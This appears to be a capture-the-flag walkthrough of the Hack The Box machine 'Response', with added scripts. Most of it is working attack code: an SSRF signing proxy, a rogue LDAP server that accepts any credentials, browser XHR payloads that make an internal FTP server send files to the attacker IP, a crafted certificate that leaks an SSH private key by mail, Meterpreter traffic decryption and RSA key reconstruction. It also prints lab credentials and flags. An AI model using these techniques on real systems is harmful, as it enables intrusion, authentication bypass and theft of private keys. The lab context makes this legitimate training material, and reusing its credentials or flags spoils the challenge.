[Meachines] [Insane] Response: SSRF + LDAP hijacking + CPRF + Nmap ssl-cert directory traversal + SMTP hijacking + D-Link + MSF ELF traffic decryption + SSH private key recovery
Word count: 1311 | 2025-08-29 08:30:06
SSRF + LDAP hijacking + CPRF + Nmap ssl-cert directory traversal + SMTP hijacking + D-Link + MSF ELF traffic decryption + SSH private key recovery: a combined penetration-testing walkthrough
Information gathering
Initial scan
- Initial scan with nmap and masscan (masscan enumerates the open ports, nmap then fingerprints only those):
ip='10.10.11.163'; itf='tun0';
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
    # masscan prints "Discovered open port 22/tcp on ..."; field 4 is "port/proto"
    # note: UDP hits land in the same list and nmap -p treats them as TCP unless prefixed with U:
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
        nmap -Pn -sV -sC -p "$ports" "$ip";
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
    fi;
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi
- Open ports found:
- 22/tcp: OpenSSH 8.2p1 Ubuntu
- 80/tcp: nginx 1.21.6 (redirects to http://www.response.htb)
Subdomain enumeration (the /etc/hosts writes below need root)
echo '10.10.11.163 response.htb www.response.htb' >> /etc/hosts
feroxbuster -u 'http://www.response.htb'
ffuf -u http://10.10.11.163 -H "Host: FUZZ.response.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac
echo '10.10.11.163 chat.response.htb api.response.htb proxy.response.htb' >> /etc/hosts
SSRF exploitation
API endpoint discovery
- The API endpoints are discovered through http://www.response.htb/status/
- The proxy.response.htb/fetch endpoint is used for SSRF testing; every request must carry a url_digest and a session_digest, which is what the signature bypass below deals with:
# API status check
curl -X POST http://proxy.response.htb/fetch \
-H "Content-Type: application/json" \
-d '{"url":"http://api.response.htb/", "url_digest":"cab532f75001ed2cc94ada92183d2160319a328e67001a9215956a5dbf10c545", "method":"GET", "session":"a9144686faaab657551013989fa61b40", "session_digest":"177ebd6ee1a551f0ef67a3e00260798b43ef18018777094f79eda47ab40de96e"}'
# Fetch the server list
curl -X POST http://proxy.response.htb/fetch \
-H "Content-Type: application/json" \
-d '{"url":"http://api.response.htb/get_servers", "url_digest":"3ca24716672824484bd11c4ae8dfdbfef8ca2b94084c597a9d4c03fad7e28df7", "method":"GET", "session":"a9144686faaab657551013989fa61b40", "session_digest":"177ebd6ee1a551f0ef67a3e00260798b43ef18018777094f79eda47ab40de96e"}'
Signature bypass
- Passing PHPSESSID as an array (PHPSESSID[]=...) triggers an error
- /var/www/html/status/main.js.php signs whatever value PHPSESSID holds with hash_hmac (sha256) and returns it as session_digest; the proxy below abuses this by sending the target URL as PHPSESSID and reusing the returned digest as url_digest, which the fetch endpoint accepts
- Local proxy that generates a valid signature for every request (point the internal hostnames at this proxy in /etc/hosts and browse them through it):
import base64
import re
import requests
from flask import Flask, request, Response

app = Flask(__name__)
mimetypes = {"css": "text/css", "js": "application/javascript"}


def get_digest(target):
    # main.js.php signs the PHPSESSID cookie value; sending the target URL as
    # the session ID therefore returns a digest that is valid as url_digest
    cookies = {'PHPSESSID': target}
    resp = requests.get('http://www.response.htb/status/main.js.php', cookies=cookies)
    digest = re.findall("'session_digest':'([a-f0-9]+)'", resp.text)[0]
    return digest


@app.route('/', defaults={'path': ''}, methods=["GET", "POST"])
@app.route('/<path:path>', methods=["GET", "POST"])
def all(path):
    # the full URL the browser asked this proxy for is forwarded unchanged,
    # so chat/api/... must resolve to this proxy for the Host to be right
    target = request.url
    body = {
        "url": target,
        "url_digest": get_digest(target),
        "method": request.method,
        "session": "2f54d5421b84fbcf96ca7f4b7e8b28d7",
        "session_digest": "628ddf8d85a8adc6f84b08362dfff13de0cb0ee4698b642333e0f94db0de64f6"
    }
    if request.method == "POST":
        body['body'] = base64.b64encode(request.data).decode()
    # proxies= routes the outgoing request through Burp on 127.0.0.1:8080; drop it if unused
    resp = requests.post('http://proxy.response.htb/fetch', json=body,
                         proxies={'http': 'http://127.0.0.1:8080'})
    result = resp.json()
    if 'error' in result:
        return result
    if result['status_code'] == 200:
        body = base64.b64decode(result['body'])
        mimetype = mimetypes.get(target.rsplit('.', 1)[-1], 'text/html')
        return Response(body, mimetype=mimetype)
    return resp.text


if __name__ == "__main__":
    app.run(debug=True, port=8001)
LDAP hijacking and authentication bypass
Initial authentication
- chat.response.htb authenticates users against LDAP
- Default credentials: guest/guest
LDAP hijacking
- Serve a forged LDAP BindResponse. The bytes below are a complete LDAPMessage: messageID 1, [APPLICATION 1] BindResponse with resultCode 0 (success) and empty matchedDN and diagnosticMessage. Port 389 needs root, nc answers one connection and exits, and the messageID is hard-coded to 1, so the client's bind must be its first message:
echo -ne '\x30\x0C\x02\x01\x01\x61\x07\x0A\x01\x00\x04\x00\x04\x00' | nc -lvnp 389
- Point the authentication request at the attacker-controlled LDAP server (the application takes the server from the request body):
{
"username":"admin",
"password":"adminhacked",
"authserver":"10.10.16.33"
}
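The nc one-liner only works once and only for messageID 1. As an added example that is not part of the original writeup, the fake LDAP server below (written for this page; the bind address, the single 4096-byte read and the sample request bytes in the test are assumptions) parses the BindRequest's messageID and bind DN, answers with a success BindResponse carrying the matching ID, and keeps accepting connections. For ID 1 it produces exactly the byte string piped into nc above. Like the nc trick, it closes the connection on anything that is not a bind, so an application that issues a search after binding will need that operation handled too.

```python
import socket


def ber_length(n):
    """Encode a BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def read_tlv(buf, off):
    """Read one BER TLV at buf[off]; return (tag, value, offset after it)."""
    tag = buf[off]
    first = buf[off + 1]
    if first < 0x80:
        length, start = first, off + 2
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[off + 2:off + 2 + nbytes], "big")
        start = off + 2 + nbytes
    return tag, buf[start:start + length], start + length


def parse_bind_request(data):
    """Return (messageID, bind DN) for an LDAP BindRequest, or None for anything else."""
    if len(data) < 2:
        return None
    tag, msg, _ = read_tlv(data, 0)
    if tag != 0x30:                      # LDAPMessage SEQUENCE
        return None
    tag, mid, off = read_tlv(msg, 0)
    if tag != 0x02:                      # messageID INTEGER
        return None
    tag, body, _ = read_tlv(msg, off)
    if tag != 0x60:                      # [APPLICATION 0] BindRequest
        return None
    _, _version, off = read_tlv(body, 0)  # version INTEGER (3)
    _, name, _ = read_tlv(body, off)      # name LDAPDN
    return int.from_bytes(mid, "big"), name.decode("utf-8", "replace")


def build_bind_response(message_id, result_code=0):
    """LDAPMessage { messageID, [APPLICATION 1] BindResponse { resultCode, matchedDN '', diagnosticMessage '' } }."""
    mid = message_id.to_bytes(max(1, (message_id.bit_length() + 8) // 8), "big")
    op = bytes([0x0A, 0x01, result_code]) + b"\x04\x00\x04\x00"
    seq = b"\x02" + ber_length(len(mid)) + mid + b"\x61" + ber_length(len(op)) + op
    return b"\x30" + ber_length(len(seq)) + seq


def serve(bind_ip, port=389):
    """Answer every BindRequest with success, whatever credentials were sent."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_ip, port))
        srv.listen(5)
        while True:
            conn, peer = srv.accept()
            with conn:
                parsed = parse_bind_request(conn.recv(4096))
                if parsed is None:
                    continue             # not a bind: the client just sees the socket close
                message_id, name = parsed
                print(f"[+] {peer[0]} bind as {name!r} (messageID {message_id}) -> success")
                conn.sendall(build_bind_response(message_id))


if __name__ == "__main__":
    serve("0.0.0.0")  # port 389 needs root or CAP_NET_BIND_SERVICE
```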
CPRF and FTP active-mode exploitation
FTP credential discovery
- FTP server: 172.18.0.2:2121 (reachable from the victim's browser on the internal network)
- Username: ftp_user
- Password: Secret12345
Sending FTP commands via XHR
- The victim's browser POSTs a raw FTP dialogue to the FTP port. The FTP daemon rejects the HTTP request line and headers as unknown commands, then executes the commands in the body. PORT 10,10,16,33,223,1 tells the server to open the data connection to 10.10.16.33 on port 223*256+1 = 57089, so listen there (for example nc -lvnp 57089) before the page is loaded:
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://172.18.0.2:2121", true);
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,33,223,1\r\nLIST\r\n");
</script>
File download (RETR delivers the file to the same data listener):
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://172.18.0.2:2121", true);
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,33,223,1\r\nRETR creds.txt\r\n");
</script>
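The attacker side of the exchange above, as an added example that is not part of the original writeup: it encodes and decodes the PORT argument (so 57089 is derived rather than remembered), builds the HTML page that makes the browser send the FTP script, and opens the active-mode data listener that receives the LIST output or the RETR'd file. The helper that connects to the listener exists only to exercise it offline and stands in for the FTP server; the file name ftp.html and the ports are assumptions.

```python
import socket


def port_argument(ip, port):
    """Encode ip:port as the h1,h2,h3,h4,p1,p2 argument of the FTP PORT command."""
    p1, p2 = divmod(port, 256)
    return ",".join(ip.split(".") + [str(p1), str(p2)])


def parse_port_argument(arg):
    """Inverse of port_argument: '10,10,16,33,223,1' -> ('10.10.16.33', 57089)."""
    parts = [int(x) for x in arg.split(",")]
    return ".".join(str(x) for x in parts[:4]), parts[4] * 256 + parts[5]


def ftp_script(user, password, data_ip, data_port, *commands):
    """Raw FTP dialogue the browser will send as the POST body."""
    lines = [f"USER {user}", f"PASS {password}", f"PORT {port_argument(data_ip, data_port)}"]
    return "\r\n".join(lines + list(commands)) + "\r\n"


def xhr_page(ftp_host, ftp_port, script):
    """HTML that makes the victim browser POST the FTP script to the FTP server."""
    # The FTP daemon answers the HTTP request line and headers with errors and then
    # runs the commands in the body; the browser never gets a usable reply, which
    # is why the result has to come back over the active-mode data connection.
    js_body = script.replace("\\", "\\\\").replace('"', '\\"').replace("\r\n", "\\r\\n")
    return (
        "<script>\n"
        "var xhr = new XMLHttpRequest();\n"
        f'xhr.open("POST", "http://{ftp_host}:{ftp_port}", true);\n'
        f'xhr.send("{js_body}");\n'
        "</script>\n"
    )


def open_data_listener(bind_ip, port):
    """Listening socket for the data connection the FTP server opens towards us."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_ip, port))
    srv.listen(1)
    return srv


def collect_data(listener, timeout=60):
    """Accept one data connection and return everything the server sends (LIST output or a file)."""
    listener.settimeout(timeout)
    conn, _ = listener.accept()
    chunks = []
    with conn:
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def push_to_listener(addr, payload):
    """Stand-in for the FTP server's data connection; used only to test collect_data offline."""
    with socket.create_connection(addr) as c:
        c.sendall(payload)


if __name__ == "__main__":
    script = ftp_script("ftp_user", "Secret12345", "10.10.16.33", 57089, "RETR creds.txt")
    with open("ftp.html", "w") as f:
        f.write(xhr_page("172.18.0.2", 2121, script))
    listener = open_data_listener("10.10.16.33", 57089)   # must be up before the victim loads ftp.html
    print(collect_data(listener).decode(errors="replace"))
```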
Nmap ssl-cert directory traversal
LDAP information gathering (admin bind, listing the hosts the scanner will visit)
ldapsearch -x -D "cn=admin,dc=response,dc=htb" -w "aU4EZxEAOnimLNzk3" -s sub -b "ou=servers,dc=response,dc=htb" "(objectclass=ipHost)"
Create a malicious LDAP entry (ipHostNumber points at the attacker, so the scan targets us; the manager is who the report gets mailed to)
dn: cn=maptnh,ou=servers,dc=response,dc=htb
objectClass: top
objectClass: ipHost
objectClass: device
cn: maptnh
manager: uid=marie,ou=customers,dc=response,dc=htb
ipHostNumber: 10.10.16.33
Craft the SSL certificate (the ST field carries the path of the file to read; the \/ escapes keep the slashes inside the field instead of letting openssl treat them as subject separators, and this is the value the ssl-cert script output is built from)
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/C=US/ST=home\/scryh\/.ssh\/id_rsa/O=maptnh Inc/OU=H4CK13"
Check the subject survived as one field with openssl x509 -in cert.pem -noout -subject, then serve it on the port the scan probes, e.g. openssl s_server -key key.pem -cert cert.pem -www -accept 443
Configure DNS and SMTP
- Configure dnsmasq (wildcard A record for maptnh.htb, and an MX record that routes mail for response-test.htb to us):
vim /etc/dnsmasq.conf
listen-address=10.10.16.33
address=/.maptnh.htb/10.10.16.33
mx-host=response-test.htb,maptnh.htb,0
sudo systemctl restart dnsmasq
- Start an SMTP server to receive the report:
python -m smtpd -n -c DebuggingServer 10.10.16.33:25
The smtpd module was removed in Python 3.12; on a current interpreter use aiosmtpd instead (python -m aiosmtpd -n -l 10.10.16.33:25), and note that DebuggingServer only prints the message, so a base64 attachment still has to be decoded by hand.
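A debugging SMTP server dumps the raw message and leaves the attachment as base64. The following is an added example, not part of the original writeup: a minimal SMTP receiver written for this page that runs the command state machine per connection and writes every attachment of every received message to disk, so the file arrives already decoded. The sample report it builds is constructed here (the attachment is a placeholder string, not key material), and the host name, the mail addresses and the output file naming are assumptions.

```python
import email
import socket
from email import policy
from email.message import EmailMessage


class MiniSMTP:
    """SMTP receiver state machine: feed one line (without CRLF), get the reply to send."""

    def __init__(self, hostname="maptnh.htb"):
        self.hostname = hostname.encode()
        self.in_data = False
        self.lines = []
        self.messages = []  # raw RFC 5322 messages, one per DATA block

    def greeting(self):
        return b"220 " + self.hostname + b" ESMTP ready\r\n"

    def feed(self, line):
        if self.in_data:
            if line == b".":
                self.in_data = False
                self.messages.append(b"\r\n".join(self.lines))
                self.lines = []
                return b"250 OK: queued\r\n"
            # RFC 5321 dot-stuffing: a leading '.' is stripped on receipt
            self.lines.append(line[1:] if line.startswith(b".") else line)
            return None
        verb = line[:4].upper()
        if verb in (b"HELO", b"EHLO"):
            return b"250 " + self.hostname + b"\r\n"
        if verb in (b"MAIL", b"RCPT", b"NOOP", b"RSET"):
            return b"250 OK\r\n"
        if verb == b"DATA":
            self.in_data = True
            return b"354 End data with <CR><LF>.<CR><LF>\r\n"
        if verb == b"QUIT":
            return b"221 Bye\r\n"
        return b"502 Command not implemented\r\n"


def attachments(raw):
    """Map attachment filename -> decoded bytes for one raw message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = {}
    for part in msg.walk():
        name = part.get_filename()
        if name:
            found[name] = part.get_payload(decode=True)
    return found


def build_sample_report():
    """Constructed stand-in for the scan report mail, with a placeholder id_rsa attached."""
    msg = EmailMessage()
    msg["From"] = "scryh@response.htb"
    msg["To"] = "marie@response-test.htb"
    msg["Subject"] = "scan report"
    msg.set_content("scan results attached")
    msg.add_attachment(b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed-placeholder\n-----END OPENSSH PRIVATE KEY-----\n",
                       maintype="application", subtype="octet-stream", filename="id_rsa")
    return msg.as_bytes()


def serve(bind_ip, port=25):
    """Accept connections, drive the state machine, and save every attachment received."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_ip, port))
        srv.listen(5)
        while True:
            conn, peer = srv.accept()
            with conn:
                session = MiniSMTP()
                conn.sendall(session.greeting())
                buf = b""
                while True:
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    buf += chunk
                    while b"\n" in buf:
                        line, buf = buf.split(b"\n", 1)
                        reply = session.feed(line.rstrip(b"\r"))
                        if reply:
                            conn.sendall(reply)
                for i, raw in enumerate(session.messages):
                    for name, data in attachments(raw).items():
                        with open(f"{peer[0]}_{i}_{name}", "wb") as f:
                            f.write(data)
                        print(f"[+] saved attachment {name} ({len(data)} bytes) from {peer[0]}")


if __name__ == "__main__":
    serve("10.10.16.33")  # port 25 needs root or CAP_NET_BIND_SERVICE
```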
D-Link file sharing
Set up the dlink server (attacker side; one direction per instance)
./dlink server --port 10098 --path /tmp/scryh/tran --key abcdefgh &
./dlink server --port 10099 --path /tmp/scryh/tran --key abcdefgh --reverse &
Connect from the target
./dlink client --endpoint "10.10.16.33:10098" --path /home/scryh/incident_2022-3-042 --key abcdefgh &
./dlink client --endpoint "10.10.16.33:10099" --path /home/scryh/incident_2022-3-042 --key abcdefgh --reverse &
Meterpreter traffic decryption
Extract the AES key (bulk_extractor carves AES key schedules out of the core dump)
bulk_extractor core.auto_update -o bulk_extractor/
cat bulk_extractor/aes_keys.txt
AES key found (32 bytes, i.e. AES-256):
f2 00 3c 14 3d c8 43 6f 39 ad 6f 8f c4 c2 4f 3d 35 a3 5d 86 2e 10 b4 c6 54 ae dc 0e d9 dd 3a c5
Decryption script (msfconsts is the author's own module of TLV type and command-ID tables)
#!/usr/bin/env python3
import uuid
from Crypto.Cipher import AES
from scapy.all import *
from msfconsts import tlv_types, cmd_ids
enc_types = {0: "None", 1: "AES256", 2: "AES128"}
packet_types = {0: "Req", 1: "Resp"}
aes_key = bytes.fromhex('f2 00 3c 14 3d c8 43 6f 39 ad 6f 8f c4 c2 4f 3d 35 a3 5d 86 2e 10 b4 c6 54 ae dc 0e d9 dd 3a c5')
def xor(buf, key):
return bytes([x ^ key[i % len(key)] for i, x in enumerate(buf)])
# decryption handling code...
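The decryption body is not reproduced above. As an added example that is not part of the original writeup, the decoder below is written for this page from the packet layout in metasploit's packet.rb: a 4-byte XOR key, then a 16-byte session GUID, 4-byte encryption flags (0 none, 1 AES-256, 2 AES-128, matching enc_types above), a 4-byte length that counts from the length field itself, a 4-byte packet type, and the TLVs. Everything after the XOR key is XORed with it, and with flag 1 the TLV area is a 16-byte IV followed by AES-CBC ciphertext with PKCS#7 padding, decrypted with the key carved above. build_packet assembles packets the same way so the decoder can be exercised on constructed input; the AES path assumes pycryptodome (Crypto.Cipher), as the page's script does, and the TLV ids listed are only the few needed here.

```python
import os
import struct
import uuid

# Header layout from lib/rex/post/meterpreter/packet.rb (big-endian):
# xor_key[4] | session_guid[16] | enc_flags[4] | length[4] | type[4] | TLVs...
HEADER = struct.Struct(">4s16sIII")
ENC_NONE, ENC_AES256, ENC_AES128 = 0, 1, 2
PACKET_TYPES = {0: "Req", 1: "Resp", 10: "PlainReq", 11: "PlainResp"}

# TLV meta-type bits and a few TLV ids (tlv.rb); strings are NUL-terminated on the wire
META_STRING, META_UINT = 1 << 16, 1 << 17
TLV_METHOD, TLV_REQUEST_ID, TLV_RESULT = META_STRING | 1, META_STRING | 2, META_UINT | 4

# AES-256 key carved from the core dump on the page
AES_KEY = bytes.fromhex("f2003c143dc8436f39ad6f8fc4c24f3d35a35d862e10b4c654aedc0ed9dd3ac5")


def xor(buf, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buf))


def build_tlv(ttype, value):
    if ttype & META_STRING:
        raw = value.encode() + b"\x00"
    elif ttype & META_UINT:
        raw = struct.pack(">I", value)
    else:
        raw = value
    return struct.pack(">II", len(raw) + 8, ttype) + raw


def parse_tlvs(data):
    """Walk the TLV area: 4-byte length (including its 8-byte header), 4-byte type, value."""
    tlvs, off = [], 0
    while off + 8 <= len(data):
        length, ttype = struct.unpack(">II", data[off:off + 8])
        value = data[off + 8:off + length]
        if ttype & META_STRING:
            value = value.rstrip(b"\x00").decode("utf-8", "replace")
        elif ttype & META_UINT:
            value = struct.unpack(">I", value)[0]
        tlvs.append((ttype, value))
        off += length
    return tlvs


def build_packet(tlvs, ptype=0, xor_key=b"\x11\x22\x33\x44", guid=b"\x00" * 16, aes_key=None, iv=None):
    """Assemble a packet the way the agent does; aes_key=None yields an unencrypted one."""
    body = b"".join(build_tlv(t, v) for t, v in tlvs)
    enc = ENC_NONE
    if aes_key is not None:
        from Crypto.Cipher import AES           # pycryptodome, assumed installed
        from Crypto.Util.Padding import pad
        iv = iv or os.urandom(16)
        body = iv + AES.new(aes_key, AES.MODE_CBC, iv).encrypt(pad(body, 16))
        enc = ENC_AES256 if len(aes_key) == 32 else ENC_AES128
    header = HEADER.pack(xor_key, guid, enc, len(body) + 8, ptype)
    return xor_key + xor(header[4:] + body, xor_key)


def decode_packet(raw, aes_key=None):
    """Undo the XOR, read the header, decrypt the body if flagged, and parse the TLVs."""
    xor_key = raw[:4]
    clear = xor_key + xor(raw[4:], xor_key)
    _, guid, enc, length, ptype = HEADER.unpack(clear[:HEADER.size])
    body = clear[HEADER.size:24 + length]        # length counts from offset 24 (the length field)
    if enc in (ENC_AES256, ENC_AES128):
        if aes_key is None:
            raise ValueError("encrypted packet but no AES key supplied")
        from Crypto.Cipher import AES
        from Crypto.Util.Padding import unpad
        iv, ciphertext = body[:16], body[16:]
        body = unpad(AES.new(aes_key, AES.MODE_CBC, iv).decrypt(ciphertext), 16)
    return {
        "guid": str(uuid.UUID(bytes=guid)),
        "enc": enc,
        "type": PACKET_TYPES.get(ptype, ptype),
        "tlvs": parse_tlvs(body),
    }
```

To apply this to a capture, reassemble each TCP stream, cut it into packets using the decoded length field (24 + length bytes per packet), and pass each one to decode_packet with the carved key; the first packets of a session are exchanged unencrypted (enc_flags 0) before the key negotiation, which is a quick sanity check that the framing is right.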
SSH private key recovery
Partial private key found
The decrypted data contains the tail of an OpenSSH private key. In this format the private section ends with the mpints n, e, d, iqmp, p, q, then the comment string and the 1,2,3,... padding; the suffix AAAADXJvb3RAcmVzcG9uc2UBAgMEBQ== is the comment root@response plus padding, so the 193-byte mpint right before it is q:
ntEd3KnWNpkbwp28vVgasUOq3CQBbDOQAAAMEAxwsaGXCZwMb/JH88XvGhu1Bo2zomIhaVMrbN5x4q3c7Z0u9gmkXO+NWMpX7T20l0OBEIhrW6DQOsxis/CrS5u69F6tUZjlUdNE1zIE7IFv2QurMwNL89/SnlQbe24xb+IjafKUaOPsNcpFakP4vxnKL+uw6qFoqRdSZyndgArZKDK26Z7ZzdV2ln2kyiLfokN8WbYxHeQ/7/jVBXf71BU1+Xg8X44njVp3Xf9gO6cYVaqb1xBsZ7bG8Warkycj7ZAAAADXJvb3RAcmVzcG9uc2UBAgMEBQ==
Dump n and e from the public key with RsaCtfTool
python RsaCtfTool.py --publickey authorized_keys --dumpkey
Compute the missing parameters (n and e from the dump above; check that q divides n before trusting the result)
q=int('c70b1a197099c0c6ff247f3c5ef1a1bb5068db3a2622169532b6cde71e2addced9d2ef609a45cef8d58ca57ed3db497438110886b5ba0d03acc62b3f0ab4b9bbaf45ead5198e551d344d73204ec816fd90bab33034bf3dfd29e541b7b6e316fe22369f29468e3ec35ca456a43f8bf19ca2febb0eaa168a917526729dd800ad92832b6e99ed9cdd576967da4ca22dfa2437c59b6311de43feff8d50577fbd41535f9783c5f8e278d5a775dff603ba71855aa9bd7106c67b6c6f166ab932723ed9', 16)
assert n % q == 0, "q does not divide n: wrong public key or mis-decoded fragment"
p = n // q
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
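Decoding the fragment is the fiddly step: it starts mid-stream, so the base64 only lines up if you drop len % 4 leading characters (it is aligned to the end of the blob, which it includes). As an added example that is not part of the original writeup, the code below does that realignment, locates the trailing "mpint, comment, padding" layout in the decoded bytes, and then derives the remaining RSA parameters from n, e and q. The fragment is the one quoted above; n and e are not on the page, so the recovery function is demonstrated on small textbook values in the test, and the padding-length bound of 8 assumes an unencrypted key (cipher none).

```python
import base64

# Tail of the key's base64 blob as quoted on the page
KEY_TAIL = (
    "ntEd3KnWNpkbwp28vVgasUOq3CQBbDOQAAAMEAxwsaGXCZwMb/JH88XvGhu1Bo2zomIhaVMrbN5x4q3c7Z0u9gmkXO"
    "+NWMpX7T20l0OBEIhrW6DQOsxis/CrS5u69F6tUZjlUdNE1zIE7IFv2QurMwNL89/SnlQbe24xb+IjafKUaOPsNcpF"
    "akP4vxnKL+uw6qFoqRdSZyndgArZKDK26Z7ZzdV2ln2kyiLfokN8WbYxHeQ/7/jVBXf71BU1+Xg8X44njVp3Xf9gO6"
    "cYVaqb1xBsZ7bG8Warkycj7ZAAAADXJvb3RAcmVzcG9uc2UBAgMEBQ=="
)


def decode_tail(fragment):
    """Decode a base64 fragment that runs to the end of the blob: realign by dropping len % 4 leading chars."""
    fragment = "".join(fragment.split())
    return base64.b64decode(fragment[len(fragment) % 4:])


def is_padding(tail):
    """OpenSSH pads the private section with the bytes 1, 2, 3, ... up to the block size."""
    return tail == bytes(range(1, len(tail) + 1))


def last_mpint_and_comment(buf, block_size=8):
    """Find 'mpint q, string comment, padding' at the end of a decoded private section."""
    for i in range(len(buf) - 4):
        qlen = int.from_bytes(buf[i:i + 4], "big")
        j = i + 4 + qlen
        if qlen == 0 or j + 4 > len(buf):
            continue
        clen = int.from_bytes(buf[j:j + 4], "big")
        k = j + 4 + clen
        if k <= len(buf) and len(buf) - k < block_size and is_padding(buf[k:]):
            return int.from_bytes(buf[i + 4:j], "big"), buf[j + 4:k].decode("utf-8", "replace")
    raise ValueError("no trailing mpint/comment/padding layout found")


def recover_rsa(n, e, q):
    """Given n and e from the public key and one prime factor q, derive the full private key."""
    if n % q != 0:
        raise ValueError("q does not divide n: wrong public key or mis-decoded fragment")
    p = n // q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)
    return {"p": p, "q": q, "d": d, "dp": d % (p - 1), "dq": d % (q - 1), "qinv": pow(q, -1, p)}


if __name__ == "__main__":
    q, comment = last_mpint_and_comment(decode_tail(KEY_TAIL))
    print(f"comment={comment!r} q_bits={q.bit_length()} q_hex={q:x}"[:100])
```

With p, q and d in hand, pycryptodome's RSA.construct((n, e, d, p, q)).export_key() writes a PKCS#1 PEM that ssh -i accepts directly.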
Final privilege escalation
Log in with the recovered SSH private key
ssh -i recovered_key root@response.htb
Obtain the flags
- User flag: 04b2cb1b44a49538de54fa1de3c33191
- Root flag: b7cb217e7152b4bff571b5bbaefa18da
Key takeaways
- SSRF: a signature bypass plus a local proxy turns the fetch endpoint into a browser for internal services
- LDAP hijacking: controlling the LDAP server the application binds to means any credentials get a success BindResponse
- CPRF + FTP: raw FTP commands sent from the browser via XHR, with active mode pushing the data back to the attacker
- Nmap: the ssl-cert script's output is used to build file paths, so a crafted certificate subject reads sensitive files
- dlink tool: bidirectional file transfer around the box's restrictions
- Traffic decryption: the AES key carved from a memory dump decrypts the captured Meterpreter session
- RSA private key recovery: a partial private key (q) plus the public n and e yields the full key
This box chains several advanced techniques and shows that in a complex environment several vulnerabilities and tools have to be combined to reach the final goal.